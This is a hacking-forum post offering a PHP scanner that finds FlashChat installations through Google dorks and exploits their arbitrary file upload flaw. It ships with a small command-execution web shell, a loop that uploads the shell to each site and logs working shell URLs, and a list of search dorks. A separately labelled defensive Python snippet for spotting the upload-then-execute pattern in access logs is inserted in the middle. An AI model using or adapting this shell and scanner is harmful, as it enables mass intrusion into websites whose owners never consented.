Hola! Xploiters,

Well, here is another scanner for you guys. You can use it in case you need some quick and easy shells. It targets the Arbitrary File Upload Vulnerability in FlashChat, which is widely used on thousands of websites.

Just like the vBulletin scanner, give it good dorks and it will do the rest for you.

Screenshot of the script in action:
[Image: gUFgHDQ.png]

How to Use:
Code:
1. Save this script as "FlashScan.php".
2. Place your PHP shell in the same directory as the FlashScan.php and name your shell as "g00n.php"
3. On Line#47 give the full path of g00n.php (shell)
4. Execute FlashScan.php and start hunting.

Use a small shell to keep the scanning speed up. For example, save the code below as g00n.php:

g00n.php
Code:
<?php
echo "<h3>Works! Usage: g00n.php?g00n=[CMD]</h3>";
echo "<pre>";
$cmd = isset($_GET['g00n'])?$_GET['g00n']:"whoami";
echo passthru($cmd);
echo "</pre>";
echo "<br />g00n - Xploiter.net";
?>

Aaaand here is the scanner...

FlashScan.php:
Code:
<?php
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
    $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
    $rank1 = $xml->SD[1];
    if($rank1)
        $rank = $rank1->POPULARITY->attributes()->TEXT;
    else
        $rank = 0;
    return $rank;
}
   
function google_that($query, $page=1)
{
    $resultPerPage=8;
    $start = $page*$resultPerPage;
    $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
    $resultFromGoogle = json_decode( http_get($url, true) ,true);
    if(isset($resultFromGoogle['responseStatus'])) {
        if($resultFromGoogle['responseStatus'] != '200') return false;
        if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
        else return $resultFromGoogle['responseData']['results'];
    }
    else
        die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
   
function http_get($url, $safemode = false){
    if($safemode === true) sleep(1);
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close();
}

function check_vuln($url) {
$shell = dirname($url) . '/temp/g00n.php';
$url = dirname($url) . '/upload.php';
$postFields = array();
$filePath = "D:\\xampp\\htdocs\\g00n.php";
$postFields['file'] = "@$filePath";
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($curl_handle);
curl_close($curl_handle);
if(strpos($result,"@g00n.php") != false)
    return $shell;
else
    return "Fail!";
}
?>

<html>
<head>
    <meta name="Content-Type" content="text/html; charset=UTF-8">
    <title>FlashChat Arbitrary File Upload - by g00n</title>
    <style type="text/css">
        body{ background-color:#000000; font: normal 14px Verdana; color:#ffffff;}
        input{ border-width:0px; padding:2px; width:250px; }
        a{ text-decoration:underline; color:#ffffff;}
        #button{ width:50px;}
        #result{margin:10px;}
        #result span{display:block;}
        #result .Y{background-color:green;}
        #result .X{background-color:red;}
    </style>
</head>
<body>
<center>
<br />
<h1><font color="green">FlashChat Scanner</font></h1>
[For FlashChat Arbitrary File Upload Vuln]<br /><font size="1">Note: the bug was found by somebody else</font><br /><br /><br />
    <form method="post">
        Google Dork:
        <input type="text" id="dork" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'intitle:FlashChat v6'; ?>" />
        <input type="submit" value="Start" id="button"/>
    </form>
<?php
    if(isset($_POST['dork']{0})) {
        $file = fopen("g00nShellz.txt","a");
        echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';           
        letItBy();           
        for($googlePage = 1; $googlePage <= 50; $googlePage++) {
            $googleResult = google_that($_POST['dork'], $googlePage);
            if(!$googleResult) {
                echo 'Finished scanning.';
                fclose($file);
                break;
            }
           
            for($victim = 0; $victim < sizeof($googleResult); $victim++){
                $result = check_vuln($googleResult[$victim]['unescapedUrl']);
                $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
                echo "Currently checking...";
                if($result != "Fail!"){
                    $line = $result . " | " . $alexa . "\n";
                    fwrite($file,$line);
                    echo '<span class="Y">';
                    echo "SITE: <a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['unescapedUrl']}</a> - <b>VULNERABLE</b>\n";
                    echo "<br /><a href=\"$result\" target=\"_blank\"><b>OPEN SHELL</b></a>";
                    echo " - Alexa Rank = <b>" . $alexa . "</b></span><br />";
                }
                else {
                echo '<span class="X">';
                echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - NOT VULNERABLE";
                if($alexa <= 50000)
                    echo " - " . $alexa;
                echo "</span>\n<br />";
                }
                letItBy();
            }
        }
        echo '</div>';
    }
?>
<br /><br />
<font color="red" face="verdana" size="1"><b>Coded by g00n.<br />Greets: Xploiter.net</b></font>
</center>
</body>
</html>
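As an added example (not part of the original post), here is defender-side detection logic for the pattern the scanner above relies on: a POST to upload.php followed, from the same client, by a request for a .php file under temp/. The log format and all addresses are constructed for the example.

```python
import re
from datetime import datetime

# Apache/nginx "combined" access log format (constructed sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Paths the FlashChat scanner touches: upload.php (the upload handler)
# and temp/<name>.php (where the planted file is then fetched from).
UPLOAD_RE = re.compile(r'/upload\.php$')
TEMP_PHP_RE = re.compile(r'/temp/[^/?]+\.php(\?|$)')

# Constructed sample log: one client uploads and then executes, another only uploads.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2013:10:01:02 +0000] "GET /chat/flashchat.php HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2013:10:01:05 +0000] "POST /chat/upload.php HTTP/1.1" 200 312
203.0.113.7 - - [12/Mar/2013:10:01:06 +0000] "GET /chat/temp/g00n.php HTTP/1.1" 200 188
198.51.100.4 - - [12/Mar/2013:10:02:10 +0000] "GET /chat/temp/avatar.png HTTP/1.1" 200 2048
198.51.100.4 - - [12/Mar/2013:10:02:11 +0000] "POST /chat/upload.php HTTP/1.1" 200 312
"""

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    return d

def find_upload_then_execute(log_text, window_seconds=300):
    """Return (ip, upload_path, php_path) for each client that POSTs to upload.php
    and then requests a .php file under temp/ within window_seconds."""
    last_upload = {}
    hits = []
    for line in log_text.splitlines():
        r = parse(line)
        if r is None:
            continue
        if r["method"] == "POST" and UPLOAD_RE.search(r["path"]):
            last_upload[r["ip"]] = r
        elif TEMP_PHP_RE.search(r["path"]):
            up = last_upload.get(r["ip"])
            if up and 0 <= (r["ts"] - up["ts"]).total_seconds() <= window_seconds:
                hits.append((r["ip"], up["path"], r["path"]))
    return hits
```

Any hit is worth an alert on its own, since the chat's temp/ directory should never need to serve executable PHP; blocking script execution in that directory is the simplest mitigation.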

Here are some sample dorks:
Code:
intitle:FlashChat v6
inurl:flashchat.php
inurl:flashchat.php intitle:FlashChat v6
inurl:flashchat.php intitle:FlashChat v6 site:.net
inurl:flashchat.php intitle:FlashChat v6 site:.org
inurl:flashchat.php intitle:FlashChat v6 site:.uk

and so on...

Have fun.
